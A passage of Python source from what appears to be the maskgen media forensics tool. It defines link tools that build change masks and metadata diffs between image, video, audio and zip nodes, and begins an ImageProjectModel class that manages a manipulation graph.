operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
maskSet = video_tools.formMaskDiffForImage(startFileName, destIm,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
#alternateFrameFunction=operation.getCompareFunction(),
arguments=consolidate(arguments, analysis_params))
# for now, just save the first mask
if len(maskSet) > 0 and video_tools.get_mask_from_segment( maskSet[0] ) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment( maskSet[0] ))
for item in maskSet:
video_tools.drop_mask_from_segment(item)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
metaDataDiff = None
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
analysis['shape change'] = sizeDiff(startIm, destIm)
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='zip.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, []
class CollectionImageLinkTool(VideoImageLinkTool):
"""
    Supports mask construction and meta-data comparison when linking a collection to an image.
"""
def __init__(self):
VideoImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_stream_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask = np.ones((destIm.size[0],destIm.size[1]),dtype=np.uint8)*255
return startIm, destIm, ImageWrapper(mask), {}
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, destIm, mask, analysis = self.compare(start, destination, scModel)
return mask, analysis, []
class VideoVideoLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking video to video.
"""
def __init__(self):
LinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.video_without_audio_donor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask, analysis, errors = self.compareImages(start, end, scModel, 'noOp',
arguments=arguments, analysis_params={})
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'videomasks' in analysis:
analysis['videomasks'] = VideoMaskSetInfo(analysis['videomasks'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return startIm, destIm, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
if op != 'Donor' and operation.generateMask not in ['audio', 'all']:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo()
if maskSet is None:
maskSet = list()
errors = list()
elif op == 'Donor' and not skipDonorAnalysis:
errors = list()
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
else:
arguments['generate_frames'] = 0
previewer = analysis_params.pop('controller') if 'controller' in analysis_params else None
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(
arguments['Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(
arguments['End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
#alternateFrameFunction=operation.getCompareFunction(),
arguments=consolidate(arguments, analysis_params),
controller=previewer)
mask = None
for item in maskSet:
if video_tools.get_mask_from_segment(item) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment(item))
video_tools.drop_mask_from_segment(item)
if mask is None:
mask = ImageWrapper(np.ones(startIm.image_array.shape[0:2], dtype='uint8')*255)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
analysis['shape change'] = sizeDiff(startIm, destIm)
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='video.video',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
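    # Note (illustrative, not part of the original code): for video links the per-segment masks are
    # dropped above and only a representative frame mask is kept as the edge mask; the remaining
    # entries in analysis['videomasks'] carry frame ranges, times and rates. A caller could inspect
    # them roughly as:
    #   for segment in analysis['videomasks']:
    #       print(video_tools.get_rate_from_segment(segment))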
def addSubstituteMasks(self,start, destination, scModel, op, arguments={}, filename=''):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
startSegment = getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None
endSegment = getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None
subs = video_tools.formMaskForSource(startFileName,
filename,
start + '_' + destination + '_substitute',
startTimeandFrame=startSegment,
stopTimeandFrame=endSegment
)
#if subs is not None:
# analysis = {}
# startIm, startFileName = scModel.getImageAndName(start)
# destIm, destFileName = scModel.getImageAndName(destination)
# maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
# os.path.join(scModel.G.dir, start + '_' + destination + '_cmp'),
# op,
# startSegment=startSegment,
# endSegment=endSegment,
# analysis=analysis,
# alternateFunction=video_tools.maskCompare,
# arguments=arguments)
# how best to compare
return subs
class AudioVideoLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking audio to video.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.all_audio_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
        @type scModel: ImageProjectModel
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
analysis['masks count'] = 0
analysis['videomasks'] = list()
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName, frames=False, media_types=['audio'])
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
errors = []
if op == 'Donor':
errors = list()
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
elif op != 'Donor' and operation.generateMask in ['audio','all']:
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
arguments=consolidate(arguments, analysis_params))
else:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo( media_types=['audio'])
if maskSet is None:
maskSet = list()
errors = list()
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='audio.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class AudioAudioLinkTool(AudioVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking audio to audio.
"""
def __init__(self):
AudioVideoLinkTool.__init__(self)
class VideoAudioLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking video to audio.
"""
def __init__(self):
LinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.all_audio_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
analysis['masks count'] = 0
analysis['videomasks'] = list()
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName, frames=False, media_types=['audio'])
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, list()
class ImageVideoLinkTool(VideoVideoLinkTool):
"""
    Supports mask construction and meta-data comparison when linking an image to a video.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.alpha_stream_processor"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
if op == 'Donor':
mask = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
if mask is None:
mask = startIm.to_mask().invert()
return mask, {}, list()
class ZipZipLinkTool(VideoVideoLinkTool):
"""
    Supports mask construction and meta-data comparison when linking zip to zip.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
# not correct...TODO
return "maskgen.masks.donor_rules.all_stream_processors"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
from support import setPathValue
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = {}
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
rate = float(getValue(arguments, 'Frame Rate', 30))
if operation.generateMask in ['audio', 'meta']:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo()
if maskSet is None:
maskSet = list()
elif op == 'Donor' and not skipDonorAnalysis:
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
else:
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(getValue(arguments,'Start Time',None)),
endSegment=getMilliSecondsAndFrameCount(getValue(arguments,'End Time',None)),
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
arguments=consolidate(arguments, analysis_params))
for item in maskSet:
if video_tools.get_mask_from_segment(item) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment(item))
video_tools.drop_mask_from_segment(item)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
analysis['shape change'] = sizeDiff(startIm, destIm)
startZip = ZipCapture(startFileName,fps=rate)
endZip = ZipCapture(destFileName,fps=rate)
        if startZip.get_size() != endZip.get_size():
            if 'metadatadiff' not in analysis:
                analysis['metadatadiff'] = {}
            setPathValue(analysis['metadatadiff'], 'video.nb_frames', ('change', startZip.get_size(), endZip.get_size()))
            setPathValue(analysis['metadatadiff'], 'video.duration',
                         ('change', startZip.get_size() / rate, endZip.get_size() / rate))
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='zip.zip',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ZipVideoLinkTool(VideoVideoLinkTool):
"""
    Supports mask construction and meta-data comparison when linking zip to video.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
# not correct...TODO
return "maskgen.masks.donor_rules.all_stream_processors"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
from support import setPathValue
from video_tools import get_rate_from_segment, get_frames_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
        # pre-populate 'metadatadiff' so the setPathValue calls below have a dictionary to fill in
        analysis = {'metadatadiff': {}}
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo(start_time=getValue(arguments,'Start Time',0),
end_time=getValue(arguments,'End Time'))
endMaskSet = video_tools.FileMetaDataLocator(destFileName).getMaskSetForEntireVideo()
analysis['masks count'] = len(maskSet)
for videomask in maskSet:
if 'mask' in videomask:
videomask.pop('mask')
analysis['videomasks'] = maskSet
rate = get_rate_from_segment(maskSet[0])
length = get_frames_from_segment(maskSet[0])
if length != get_frames_from_segment(endMaskSet[0]) or rate != get_rate_from_segment(endMaskSet[0]):
setPathValue(analysis['metadatadiff'], 'video.nb_frames',
('change', length, get_frames_from_segment(endMaskSet[0])))
setPathValue(analysis['metadatadiff'], 'video.duration',
('change', length/float(rate), get_frames_from_segment(endMaskSet[0]) / float(get_rate_from_segment(endMaskSet[0]))))
setPathValue(analysis['metadatadiff'], 'video.avg_frame_rate',
('change', rate,get_rate_from_segment(endMaskSet[0])))
return mask, analysis, []
class VideoZipLinkTool(ZipVideoLinkTool):
"""
    Supports mask construction and meta-data comparison when linking video to zip.
"""
def __init__(self):
ZipVideoLinkTool.__init__(self)
class ZipAudioLinkTool(VideoAudioLinkTool):
"""
    Supports mask construction and meta-data comparison when linking zip to audio.
"""
def __init__(self):
VideoAudioLinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
from zip_tools import AudioPositions
from support import setPathValue
from video_tools import create_segment, get_start_time_from_segment, get_end_time_from_segment,\
update_segment,get_rate_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
maskSet = video_tools.FileMetaDataLocator(destFileName).getMaskSetForEntireVideo(
start_time=getValue(arguments, 'Start Time', 0),
end_time=getValue(arguments, 'End Time'),
media_types=['audio'])
if not len(maskSet):
raise ValueError("Cannot find audio data target file {}".format(destFileName))
node = scModel.getGraph().get_node(start)
meta_data = getValue(node,'zip content meta')
if meta_data is None:
meta_data = getValue(ZipAddTool().getAdditionalMetaData(startFileName),'zip content meta')
def audio_metadata_extractor(filename):
return meta_data[os.path.basename(filename)]
fps = float(getValue(arguments,'sample rate',maskSet[-1]['rate']))
positions = AudioPositions(startFileName,
position_file_name=getValue(arguments,'Audio Sequence File'),
fps=int(fps),
audio_metadata_extractor=audio_metadata_extractor if meta_data is not None else None)
segments = [create_segment(starttime=seg[0],
startframe=seg[1],
endtime=seg[2],
endframe=seg[3],
type='audio',
frames=seg[3]-seg[1]+1,
rate=fps)
for seg in positions.get_segments(0)]
analysis['masks count'] = 0
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = {}
analysis['videomasks'] = segments
cap_end_time = get_end_time_from_segment(maskSet[0])
if abs(get_end_time_from_segment(segments[-1]) - cap_end_time) > 0.001:
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change',get_end_time_from_segment(segments[-1]),cap_end_time))
analysis['videomasks'] = [seg for seg in analysis['videomasks'] if get_start_time_from_segment(seg) < cap_end_time]
lastseg = analysis['videomasks'][-1]
update_segment(lastseg,
endtime = cap_end_time,
endframe = int(cap_end_time*get_rate_from_segment(lastseg)/1000)+ 1)
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, list()
class AudioZipLinkTool(VideoAudioLinkTool):
"""
    Supports mask construction and meta-data comparison when linking audio to zip.
"""
def __init__(self):
VideoAudioLinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
from zip_tools import AudioPositions
from support import setPathValue
from video_tools import create_segment, get_start_time_from_segment, get_end_time_from_segment,\
update_segment, get_end_frame_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
# CAN HAVE A START TIME LATER
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo(
start_time=getValue(arguments,'Start Time',0),
end_time=getValue(arguments, 'End Time'),
media_types=['audio'])
if not len(maskSet):
raise ValueError("Cannot find audio data target file {}".format(destFileName))
node = scModel.getGraph().get_node(start)
meta_data = getValue(node,'zip content meta')
if meta_data is None:
meta_data = getValue(ZipAddTool().getAdditionalMetaData(destFileName),'zip content meta')
def audio_metadata_extractor(filename):
return meta_data[os.path.basename(filename)]
fps = float(getValue(arguments,'sample rate',maskSet[-1]['rate']))
positions = AudioPositions(destFileName,
position_file_name=getValue(arguments,'Audio Sequence File'),
fps=int(fps),
audio_metadata_extractor=audio_metadata_extractor if meta_data is not None else None)
segments = [create_segment(starttime=seg[0],
startframe=seg[1],
endtime=seg[2],
endframe=seg[3],
type='audio',
frames=seg[3]-seg[1]+1,
rate=fps)
for seg in positions.get_segments(0)]
analysis['masks count'] = 0
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = {}
analysis['videomasks'] = maskSet
cap_end_time = get_end_time_from_segment(maskSet[0])
diff = cap_end_time - get_end_time_from_segment(segments[-1])
errors = []
# IF NOT ALL THE AUDIO IS USED, THEN CUT THE END OF THE MASK SET
if diff > 0.001:
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change',cap_end_time, get_end_time_from_segment(segments[-1])))
analysis['videomasks'] = [seg for seg in analysis['videomasks'] if get_start_time_from_segment(seg) < cap_end_time]
lastseg = analysis['videomasks'][-1]
update_segment(lastseg,
endtime = get_end_time_from_segment(segments[-1]),
endframe = get_end_frame_from_segment(segments[-1]))
elif diff < 0:
            # This would be an odd occurrence: it can only happen if a sequence file is provided
            # that created 'spaces'.
if getValue(arguments,'Audio Sequence File') is None:
errors = ['Duration of target zip file is longer than the source given the provided time constraints']
            # thought about checking the mask set without an end time; perhaps
            # the sequence file is out of alignment with the provided end time.
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change', cap_end_time, get_end_time_from_segment(segments[-1])))
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ImageZipVideoLinkTool(VideoVideoLinkTool):
"""
    Supports mask construction and meta-data comparison when linking an image zip to a video.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
#destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
return mask, analysis, []
class AddTool:
def getAdditionalMetaData(self, media):
return {}
class VideoAddTool(AddTool):
def getAdditionalMetaData(self, media):
parent = {}
meta, frames = ffmpeg_api.get_meta_from_video(media, show_streams=True, with_frames=True, frame_limit=30, frame_meta=['pkt_duration_time'],media_types=['video'])
indices = ffmpeg_api.get_stream_indices_of_type(meta, 'video')
if indices:
if_vfr = ffmpeg_api.is_vfr(meta[indices[0]], frames=frames[indices[0]])
else:
if_vfr = False
meta, _ = ffmpeg_api.get_meta_from_video(media, show_streams=True,
frame_meta=['pkt_duration_time'])
parent['media'] = meta
width = 0
height = 0
rotation = 0
for item in meta:
if 'width' in item:
width = int(item['width'])
if 'height' in item:
height = int(item['height'])
if 'rotation' in item:
rotation = int(item['rotation'])
parent['shape'] = (width, height)
parent['rotation'] = rotation
if indices:
meta[indices[0]]['is_vfr'] = if_vfr
# redundant but requested by NIST
parent['is_vfr'] = if_vfr
return parent
class ZipAddTool(AddTool):
def getAdditionalMetaData(self, media):
import copy
from zipfile import ZipFile
file_type = zipFileType(media)
final_meta = {}
final_meta['media'] = []
if file_type in ['audio','video']:
tool = VideoAddTool()
duration = 0.0
frames = 0
capture = ZipCapture(media,filetypes=audiofiletypes + videofiletypes)
details = {}
while capture.isOpened():
if not capture.grab():
break
fn = capture.retrieve_file()
meta = tool.getAdditionalMetaData(fn)
new_meta = {}
for item in meta['media']:
if file_type == getValue(item, 'codec_type', 'text'):
if file_type == 'audio':
                            last_sample = getValue(item, 'sample_rate', 48000)
                            last_duration = float(getValue(item, 'duration', getValue(item, 'duration_ts', 1) / getValue(item, 'sample_rate', 48000)))
                            last_frames = int(last_duration * last_sample)
new_meta['audio'] = copy.copy(item)
details[os.path.basename(fn)] = item
else:
last_frames = int(getValue(item, 'nb_frames', 1))
last_duration = video_tools.estimate_duration(item, last_frames)
last_duration = getValue(item, 'duration', last_duration)
last_sample = last_frames/float(last_duration)
new_meta['video'] = copy.copy(item)
details[os.path.basename(fn)] = item
duration += float(last_duration)
frames += last_frames
if 'video' in new_meta:
new_meta['video']['duration'] = duration
new_meta['video']['nb_frames'] = frames
final_meta['media'] = [new_meta['video']]
if 'audio' in new_meta:
new_meta['audio']['duration'] = duration
new_meta['audio']['duration_ts'] = duration * last_sample
final_meta['media'] = meta['media'] + [new_meta['audio']]
final_meta['total duration'] = duration
final_meta['zip content meta'] = details
return final_meta
meta = {}
with ZipFile(media, 'r') as myzip:
names = myzip.namelist()
meta['length'] = len(names)
return meta
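    # Note (descriptive, not part of the original code): for audio/video zips the per-entry stream
    # meta-data is accumulated into a single summary stream (total duration and frame count) and the
    # per-file details are kept under 'zip content meta', which ZipAudioLinkTool later uses to build
    # audio position segments.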
class OtherAddTool(AddTool):
def getAdditionalMetaData(self, media):
return {}
addTools = {
'video': VideoAddTool(),
'zip':ZipAddTool(),
'collection': OtherAddTool(),
'audio': OtherAddTool(),
'image': OtherAddTool()
}
linkTools = {'image.image': ImageImageLinkTool(), 'video.video': VideoVideoLinkTool(),
'image.video': ImageVideoLinkTool(), 'video.image': VideoImageLinkTool(),
'video.audio': VideoAudioLinkTool(), 'audio.video': AudioVideoLinkTool(),
'audio.audio': AudioAudioLinkTool(), 'zip.video': ZipVideoLinkTool(),
'collection.image': CollectionImageLinkTool(),
'zip.zip': ZipZipLinkTool(), 'video.zip': VideoZipLinkTool(),
'zip.image': ZipImageLinkTool(),
'zip.audio': ZipAudioLinkTool(),
'audio.zip': AudioZipLinkTool()}
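# Note (illustrative, not part of the original code): the dispatch key into linkTools is built by
# ImageProjectModel.getLinkType as '<start file type>.<end file type>', so a video-to-image edge
# resolves roughly as:
#   tool = linkTools['video.image']   # a VideoImageLinkTool instance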
def true_notify(object, message, **kwargs):
return True
class ImageProjectModel:
"""
A ProjectModel manages a project. A project is made up of a directed graph of Image nodes and links.
Each link is associated with a manipulation between the source image to the target image.
A link contains a mask(black and white) image file describing the changes.
A mask's X&Y dimensions match the source image.
    A link contains a description of the manipulation operation, software used to perform the manipulation,
analytic results comparing source to target images, and an input mask path name. The input mask path name
describes a mask used by the manipulation software as a parameter describing the manipulation.
Links may be 'read-only' indicating that they are created through an automated plugin.
A ProjectModel can be reused to open new projects. It is designed to represent a view model (MVC).
    A ProjectModel has two state parameters, 'start' and 'end', containing the names of image nodes in the graph.
    When both are set, a link is selected. When 'start' is set and 'end' is None, only a single image node is selected.
    Several methods on the ProjectModel depend on the state of these parameters. For example, adding a new link
    to an image node chooses the source node referenced by 'end' if set; otherwise it chooses the node referenced by 'start'.
"""
G = None
start = None
end = None
notify = None
"""
@type G: ImageGraph
@type start: String
@type end: String
"""
lock = Lock()
def __init__(self, projectFileName, graph=None, notify=None,
baseImageFileName=None, username=None,tool=None):
self.probeMaskMemory = DummyMemory(None)
if notify is not None:
self.notify = notifiers.NotifyDelegate(
[notify, notifiers.QaNotifier(self), notifiers.ValidationNotifier(total_errors=None)])
else:
self.notify = notifiers.NotifyDelegate([true_notify])
if graph is not None:
graph.arg_checker_callback = self.__scan_args_callback
# Group Operations are tied to models since
# group operations are created by a local instance and stored in the graph model
# when used.
self.gopLoader = GroupOperationsLoader()
self.username = username if username is not None else get_username()
self._setup(projectFileName, graph=graph, baseImageFileName=baseImageFileName,tool=tool)
def set_notifier(self, notifier):
self.notify = notifiers.NotifyDelegate(
[notifier, notifiers.QaNotifier(self), notifiers.ValidationNotifier(total_errors=None)])
def get_dir(self):
return self.G.dir
def getGroupOperationLoader(self):
return self.gopLoader
def addImagesFromDir(self, dir, baseImageFileName=None, xpos=100, ypos=30, suffixes=list(),
sortalg=lambda s: s.lower(),preferences={}):
"""
Bulk add all images from a given directory into the project.
        Position the images in a grid, stepping 50 vertically and wrapping to a new column when the vertical limit is reached.
        Images are imported in the order determined by sortalg (case-insensitive lexicographic by default).
        If baseImageFileName, the name of an image node, is provided, then that node is selected
        upon completion of the operation. Otherwise, the last node imported is selected.
"""
initialYpos = ypos
totalSet = []
suffixes = set(suffixes)
for suffix in suffixes:
suffix_lower = suffix.lower()
totalSet.extend([filename for filename in os.listdir(dir) if
filename.lower().endswith(suffix_lower ) and \
not filename.endswith('_mask' + suffix) and \
not filename.endswith('_proxy' + suffix)])
totalSet = sorted(totalSet, key=sortalg)
added = []
for filename in totalSet:
try:
pathname = os.path.abspath(os.path.join(dir, filename))
additional = self.getAddTool(pathname).getAdditionalMetaData(pathname)
additional.update(preferences)
nname = self.G.add_node(pathname, xpos=xpos, ypos=ypos, nodetype='base', **additional)
added.append(nname)
ypos += 50
                if ypos >= 450:
ypos = initialYpos
xpos += 50
if filename == baseImageFileName:
self.start = nname
self.end = None
except Exception as ex:
logging.getLogger('maskgen').warn('Failed to add media file {}'.format(filename))
self.notify(added, 'add')
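    # Illustrative call (not part of the original code), with a hypothetical directory and suffixes:
    #   model.addImagesFromDir('/data/project_images', suffixes=['.jpg', '.png', '.tif'])
    # Files ending in '_mask<suffix>' or '_proxy<suffix>' are skipped by the filter above.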
def addImage(self, pathname, cgi=False, prnu=False, **kwargs):
maxx = 50
max_node = None
for node_id in self.G.get_nodes():
node = self.G.get_node(node_id)
if 'xpos' in node and int(node['xpos']) > maxx:
maxx = int(node['xpos'])
max_node = node
maxy = max_node['ypos'] + 50 if max_node is not None else 50
additional = self.getAddTool(pathname).getAdditionalMetaData(pathname)
additional.update(kwargs)
nname = self.G.add_node(pathname, nodetype='base',
cgi='yes' if cgi else 'no',
xpos=maxx,
ypos=maxy,
prnu='yes' if prnu else 'no',
**additional)
self.start = nname
self.end = None
self.notify([self.start], 'add')
return nname
def getEdgesBySemanticGroup(self):
"""
:return: association of semantics groups to edge id tuples (start,end)
@rtype: dict of list of tuple
"""
result = {}
for edgeid in self.getGraph().get_edges():
for grp in self.getSemanticGroups(edgeid[0], edgeid[1]):
if grp not in result:
result[grp] = [edgeid]
else:
result[grp].append(edgeid)
return result
def add_to_edge(self, **items):
self.G.update_edge(self.start, self.end, **items)
